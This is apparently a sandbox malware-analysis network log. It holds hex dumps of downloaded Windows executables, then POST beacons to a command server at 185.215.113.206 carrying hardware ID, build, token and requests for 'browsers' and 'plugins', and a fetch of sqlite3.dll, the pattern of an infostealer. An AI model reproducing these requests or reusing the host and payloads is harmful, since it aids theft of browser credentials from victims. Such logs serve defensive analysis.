10 42 00 00 02 00 00 00 f8 02 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 20 20 20 20 20 20 20 20 00 b0 29 00 00 20 42 00 00 02 00 00 00 fa 02 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 66 73 6f 79 61 6c 64 68 00 00 1b 00 00 d0 6b 00 00 fa 1a 00 00 fc 02 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 75 68 78 6e 6b 6c 74 77 00 10 00 00 00 d0 86 00 00 04 00 00 00 f6 1d 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 2e 74 61 67 67 61 6e 74 00 30 00 00 00 e0 86 00 00 22 00 00 00 fa 1d 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
Source: global traffic HTTP traffic detected: HTTP/1.1 200 OKServer: nginx/1.18.0 (Ubuntu)Date: Tue, 10 Dec 2024 01:51:18 GMTContent-Type: application/octet-streamContent-Length: 1890304Last-Modified: Tue, 10 Dec 2024 01:22:28 GMTConnection: keep-aliveETag: "675797d4-1cd800"Accept-Ranges: bytesData Raw: 4d 5a 78 00 01 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 78 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 24 00 00 50 45 00 00 4c 01 07 00 ea b9 55 67 00 00 00 00 00 00 00 00 e0 00 02 01 0b 01 0e 00 00 dc 03 00 00 b2 00 00 00 00 00 00 00 10 4b 00 00 10 00 00 00 00 00 00 00 00 40 00 00 10 00 00 00 02 00 00 06 00 00 00 00 00 00 00 06 00 00 00 00 00 00 00 00 40 4b 00 00 04 00 00 49 a7 1d 00 02 00 40 80 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 5c 40 05 00 70 00 00 00 00 30 05 00 b0 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 f8 41 05 00 08 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 20 20 00 20 20 20 20 00 20 05 00 00 10 00 00 00 42 02 00 00 10 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 2e 72 73 72 63 00 00 00 b0 02 00 00 00 30 05 00 00 04 00 00 00 52 02 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 69 64 61 74 61 20 20 00 10 00 00 00 40 05 00 00 02 00 00 00 56 02 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 20 20 20 20 20 20 20 20 00 50 2b 00 00 50 05 00 00 02 00 00 00 58 02 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 6b 63 6a 7a 6c 77 6b 74 00 60 1a 00 00 a0 30 00 00 58 1a 00 00 5a 02 00 00 00 00 00 00 00 00 00 00 00 00 00 40 
00 00 e0 63 77 62 66 73 75 76 6d 00 10 00 00 00 00 4b 00 00 04 00 00 00 b2 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 2e 74 61 67 67 61 6e 74 00 30 00 00 00 10 4b 00 00 22 00 00 00 b6 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
Source: global traffic HTTP traffic detected: HTTP/1.1 200 OKServer: nginx/1.18.0 (Ubuntu)Date: Tue, 10 Dec 2024 01:51:26 GMTContent-Type: application/octet-streamContent-Length: 1798144Last-Modified: Tue, 10 Dec 2024 01:22:35 GMTConnection: keep-aliveETag: "675797db-1b7000"Accept-Ranges: bytesData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 e8 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 20 8b b6 d4 64 ea d8 87 64 ea d8 87 64 ea d8 87 0b 9c 73 87 7c ea d8 87 0b 9c 46 87 69 ea d8 87 0b 9c 72 87 5e ea d8 87 6d 92 5b 87 67 ea d8 87 6d 92 4b 87 62 ea d8 87 e4 93 d9 86 67 ea d8 87 64 ea d9 87 09 ea d8 87 0b 9c 77 87 77 ea d8 87 0b 9c 45 87 65 ea d8 87 52 69 63 68 64 ea d8 87 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 07 00 19 64 54 67 00 00 00 00 00 00 00 00 e0 00 02 01 0b 01 0a 00 00 96 02 00 00 28 01 00 00 00 00 00 00 00 69 00 00 10 00 00 00 b0 02 00 00 00 40 00 00 10 00 00 00 02 00 00 05 00 01 00 00 00 00 00 05 00 01 00 00 00 00 00 00 30 69 00 00 04 00 00 e1 c6 1b 00 02 00 40 80 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 4d b0 24 00 61 00 00 00 00 a0 24 00 ac 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 f8 b1 24 00 08 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 20 20 00 20 20 20 20 00 90 24 00 00 10 00 00 00 68 01 00 00 10 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 2e 72 73 72 63 00 00 00 ac 01 00 00 00 a0 24 00 00 02 00 00 00 78 01 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 69 64 61 74 
61 20 20 00 10 00 00 00 b0 24 00 00 02 00 00 00 7a 01 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 20 20 20 20 20 20 20 20 00 60 2a 00 00 c0 24 00 00 02 00 00 00 7c 01 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 6c 6f 78 77 6d 76 70 6d 00 d0 19 00 00 20 4f 00 00 cc 19 00 00 7e 01 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 6c 72 6f 7a 71 69 6a 67 00 10 00 00 00 f0 68 00 00 04 00 00 00 4a 1b 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 2e 74 61 67 67 61 6e 74 00 30 00 00 00 00 69 00 00 22 00 00 00 4e 1b 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
Source: global traffic HTTP traffic detected: HTTP/1.1 200 OKServer: nginx/1.18.0 (Ubuntu)Date: Tue, 10 Dec 2024 01:51:35 GMTContent-Type: application/octet-streamContent-Length: 968192Last-Modified: Tue, 10 Dec 2024 01:20:45 GMTConnection: keep-aliveETag: "6757976d-ec600"Accept-Ranges: bytesData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 01 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 9a c7 83 ae de a6 ed fd de a6 ed fd de a6 ed fd 6a 3a 1c fd fd a6 ed fd 6a 3a 1e fd 43 a6 ed fd 6a 3a 1f fd fd a6 ed fd 40 06 2a fd df a6 ed fd 8c ce e8 fc f3 a6 ed fd 8c ce e9 fc cc a6 ed fd 8c ce ee fc cb a6 ed fd d7 de 6e fd d7 a6 ed fd d7 de 7e fd fb a6 ed fd de a6 ec fd f7 a4 ed fd 7b cf e3 fc 8e a6 ed fd 7b cf ee fc df a6 ed fd 7b cf 12 fd df a6 ed fd de a6 7a fd df a6 ed fd 7b cf ef fc df a6 ed fd 52 69 63 68 de a6 ed fd 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 05 00 65 97 57 67 00 00 00 00 00 00 00 00 e0 00 22 01 0b 01 0e 10 00 ac 09 00 00 16 05 00 00 00 00 00 77 05 02 00 00 10 00 00 00 c0 09 00 00 00 40 00 00 10 00 00 00 02 00 00 05 00 01 00 00 00 00 00 05 00 01 00 00 00 00 00 00 20 0f 00 00 04 00 00 17 28 0f 00 02 00 40 80 00 00 40 00 00 10 00 00 00 00 40 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 64 8e 0c 00 7c 01 00 00 00 40 0d 00 44 5b 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 a0 0e 00 94 75 00 00 f0 0f 0b 00 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 34 0c 00 18 00 00 00 10 10 0b 00 40 00 00 00 00 00 00 00 00 00 00 00 00 c0 09 00 94 08 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 1d ab 09 00 00 10 00 00 00 ac 09 00 00 04 00 00 00 00 00 00 00 
00 00 00 00 00 00 00 20 00 00 60 2e 72 64 61 74 61 00 00 82 fb 02 00 00 c0 09 00 00 fc 02 00 00 b0 09 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 61 74 61 00 00 00 6c 70 00 00 00 c0 0c 00 00 48 00 00 00 ac 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 72 73 72 63 00 00 00 44 5b 01 00 00 40 0d 00 00 5c 01 00 00 f4 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 94 75 00 00 00 a0 0e 00 00 76 00 00 00 50 0e 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0
Source: global traffic HTTP traffic detected: HTTP/1.1 200 OKServer: nginx/1.18.0 (Ubuntu)Date: Tue, 10 Dec 2024 01:51:42 GMTContent-Type: application/octet-streamContent-Length: 2821120Last-Modified: Tue, 10 Dec 2024 01:21:10 GMTConnection: keep-aliveETag: "67579786-2b0c00"Accept-Ranges: bytesData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 7a 86 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 45 00 00 4c 01 06 00 50 28 2c 65 00 00 00 00 00 00 00 00 e0 00 22 00 0b 01 30 00 00 24 00 00 00 08 00 00 00 00 00 00 00 80 2b 00 00 20 00 00 00 60 00 00 00 00 40 00 00 20 00 00 00 02 00 00 04 00 00 00 00 00 00 00 06 00 00 00 00 00 00 00 00 c0 2b 00 00 04 00 00 61 14 2b 00 02 00 60 00 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 55 80 00 00 69 00 00 00 00 60 00 00 00 05 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 f8 81 00 00 08 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 20 20 00 20 20 20 20 00 40 00 00 00 20 00 00 00 12 00 00 00 20 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 2e 72 73 72 63 00 00 00 00 05 00 00 00 60 00 00 00 06 00 00 00 32 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 69 64 61 74 61 20 20 00 20 00 00 00 80 00 00 00 02 00 00 00 38 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 66 6e 63 6c 6e 6a 71 76 00 c0 2a 00 00 a0 00 00 00 ac 2a 00 00 3a 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 78 75 74 6b 6a 6f 7a 69 00 20 00 00 00 60 2b 00 00 04 00 00 00 e6 2a 00 00 00 00 00 00 
00 00 00 00 00 00 00 40 00 00 e0 2e 74 61 67 67 61 6e 74 00 40 00 00 00 80 2b 00 00 22 00 00 00 ea 2a 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
Source: global traffic HTTP traffic detected: HTTP/1.1 200 OKServer: nginx/1.18.0 (Ubuntu)Date: Tue, 10 Dec 2024 01:51:53 GMTContent-Type: application/octet-streamContent-Length: 2821120Last-Modified: Tue, 10 Dec 2024 01:21:12 GMTConnection: keep-aliveETag: "67579788-2b0c00"Accept-Ranges: bytesData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 7a 86 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 45 00 00 4c 01 06 00 50 28 2c 65 00 00 00 00 00 00 00 00 e0 00 22 00 0b 01 30 00 00 24 00 00 00 08 00 00 00 00 00 00 00 80 2b 00 00 20 00 00 00 60 00 00 00 00 40 00 00 20 00 00 00 02 00 00 04 00 00 00 00 00 00 00 06 00 00 00 00 00 00 00 00 c0 2b 00 00 04 00 00 61 14 2b 00 02 00 60 00 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 55 80 00 00 69 00 00 00 00 60 00 00 00 05 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 f8 81 00 00 08 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 20 20 00 20 20 20 20 00 40 00 00 00 20 00 00 00 12 00 00 00 20 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 2e 72 73 72 63 00 00 00 00 05 00 00 00 60 00 00 00 06 00 00 00 32 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 69 64 61 74 61 20 20 00 20 00 00 00 80 00 00 00 02 00 00 00 38 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 66 6e 63 6c 6e 6a 71 76 00 c0 2a 00 00 a0 00 00 00 ac 2a 00 00 3a 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 78 75 74 6b 6a 6f 7a 69 00 20 00 00 00 60 2b 00 00 04 00 00 00 e6 2a 00 00 00 00 00 00 
00 00 00 00 00 00 00 40 00 00 e0 2e 74 61 67 67 61 6e 74 00 40 00 00 00 80 2b 00 00 22 00 00 00 ea 2a 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
Source: global traffic HTTP traffic detected: GET / HTTP/1.1Host: 185.215.113.206Connection: Keep-AliveCache-Control: no-cache
Source: global traffic HTTP traffic detected: POST /c4becf79229cb002.php HTTP/1.1Content-Type: multipart/form-data; boundary=----AKJDGIEHCAEHIEBFBKKKHost: 185.215.113.206Content-Length: 211Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 41 4b 4a 44 47 49 45 48 43 41 45 48 49 45 42 46 42 4b 4b 4b 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 42 33 36 36 34 45 38 38 38 32 38 37 32 35 35 36 31 33 34 35 35 39 0d 0a 2d 2d 2d 2d 2d 2d 41 4b 4a 44 47 49 45 48 43 41 45 48 49 45 42 46 42 4b 4b 4b 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 22 0d 0a 0d 0a 73 74 6f 6b 0d 0a 2d 2d 2d 2d 2d 2d 41 4b 4a 44 47 49 45 48 43 41 45 48 49 45 42 46 42 4b 4b 4b 2d 2d 0d 0a Data Ascii: ------AKJDGIEHCAEHIEBFBKKKContent-Disposition: form-data; name="hwid"B3664E8882872556134559------AKJDGIEHCAEHIEBFBKKKContent-Disposition: form-data; name="build"stok------AKJDGIEHCAEHIEBFBKKK--
Source: global traffic HTTP traffic detected: POST /c4becf79229cb002.php HTTP/1.1Content-Type: multipart/form-data; boundary=----IDBKKKKKFBGDGDHIDBGHHost: 185.215.113.206Content-Length: 268Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 49 44 42 4b 4b 4b 4b 4b 46 42 47 44 47 44 48 49 44 42 47 48 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 31 31 61 30 65 37 63 32 61 38 38 66 39 66 66 32 61 34 30 39 34 39 35 37 63 66 65 66 63 31 61 65 31 66 33 39 35 31 62 39 32 34 30 30 65 64 66 31 65 62 32 62 30 36 64 34 37 66 64 61 63 63 65 34 36 63 30 33 32 38 39 64 0d 0a 2d 2d 2d 2d 2d 2d 49 44 42 4b 4b 4b 4b 4b 46 42 47 44 47 44 48 49 44 42 47 48 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6d 65 73 73 61 67 65 22 0d 0a 0d 0a 62 72 6f 77 73 65 72 73 0d 0a 2d 2d 2d 2d 2d 2d 49 44 42 4b 4b 4b 4b 4b 46 42 47 44 47 44 48 49 44 42 47 48 2d 2d 0d 0a Data Ascii: ------IDBKKKKKFBGDGDHIDBGHContent-Disposition: form-data; name="token"11a0e7c2a88f9ff2a4094957cfefc1ae1f3951b92400edf1eb2b06d47fdacce46c03289d------IDBKKKKKFBGDGDHIDBGHContent-Disposition: form-data; name="message"browsers------IDBKKKKKFBGDGDHIDBGH--
Source: global traffic HTTP traffic detected: POST /c4becf79229cb002.php HTTP/1.1Content-Type: multipart/form-data; boundary=----HCFIJKKKKKFCAAAAFBKFHost: 185.215.113.206Content-Length: 267Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 48 43 46 49 4a 4b 4b 4b 4b 4b 46 43 41 41 41 41 46 42 4b 46 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 31 31 61 30 65 37 63 32 61 38 38 66 39 66 66 32 61 34 30 39 34 39 35 37 63 66 65 66 63 31 61 65 31 66 33 39 35 31 62 39 32 34 30 30 65 64 66 31 65 62 32 62 30 36 64 34 37 66 64 61 63 63 65 34 36 63 30 33 32 38 39 64 0d 0a 2d 2d 2d 2d 2d 2d 48 43 46 49 4a 4b 4b 4b 4b 4b 46 43 41 41 41 41 46 42 4b 46 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6d 65 73 73 61 67 65 22 0d 0a 0d 0a 70 6c 75 67 69 6e 73 0d 0a 2d 2d 2d 2d 2d 2d 48 43 46 49 4a 4b 4b 4b 4b 4b 46 43 41 41 41 41 46 42 4b 46 2d 2d 0d 0a Data Ascii: ------HCFIJKKKKKFCAAAAFBKFContent-Disposition: form-data; name="token"11a0e7c2a88f9ff2a4094957cfefc1ae1f3951b92400edf1eb2b06d47fdacce46c03289d------HCFIJKKKKKFCAAAAFBKFContent-Disposition: form-data; name="message"plugins------HCFIJKKKKKFCAAAAFBKF--
Source: global traffic HTTP traffic detected: POST /c4becf79229cb002.php HTTP/1.1Content-Type: multipart/form-data; boundary=----DAFIEHIEGDHIDGDGHDHJHost: 185.215.113.206Content-Length: 268Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 44 41 46 49 45 48 49 45 47 44 48 49 44 47 44 47 48 44 48 4a 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 31 31 61 30 65 37 63 32 61 38 38 66 39 66 66 32 61 34 30 39 34 39 35 37 63 66 65 66 63 31 61 65 31 66 33 39 35 31 62 39 32 34 30 30 65 64 66 31 65 62 32 62 30 36 64 34 37 66 64 61 63 63 65 34 36 63 30 33 32 38 39 64 0d 0a 2d 2d 2d 2d 2d 2d 44 41 46 49 45 48 49 45 47 44 48 49 44 47 44 47 48 44 48 4a 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6d 65 73 73 61 67 65 22 0d 0a 0d 0a 66 70 6c 75 67 69 6e 73 0d 0a 2d 2d 2d 2d 2d 2d 44 41 46 49 45 48 49 45 47 44 48 49 44 47 44 47 48 44 48 4a 2d 2d 0d 0a Data Ascii: ------DAFIEHIEGDHIDGDGHDHJContent-Disposition: form-data; name="token"11a0e7c2a88f9ff2a4094957cfefc1ae1f3951b92400edf1eb2b06d47fdacce46c03289d------DAFIEHIEGDHIDGDGHDHJContent-Disposition: form-data; name="message"fplugins------DAFIEHIEGDHIDGDGHDHJ--
Source: global traffic HTTP traffic detected: POST /c4becf79229cb002.php HTTP/1.1Content-Type: multipart/form-data; boundary=----AAKEGDAKEHJDHIDHJJDAHost: 185.215.113.206Content-Length: 6827Connection: Keep-AliveCache-Control: no-cache
Source: global traffic HTTP traffic detected: GET /68b591d6548ec281/sqlite3.dll HTTP/1.1Host: 185.215.113.206Cache-Control: no-cache
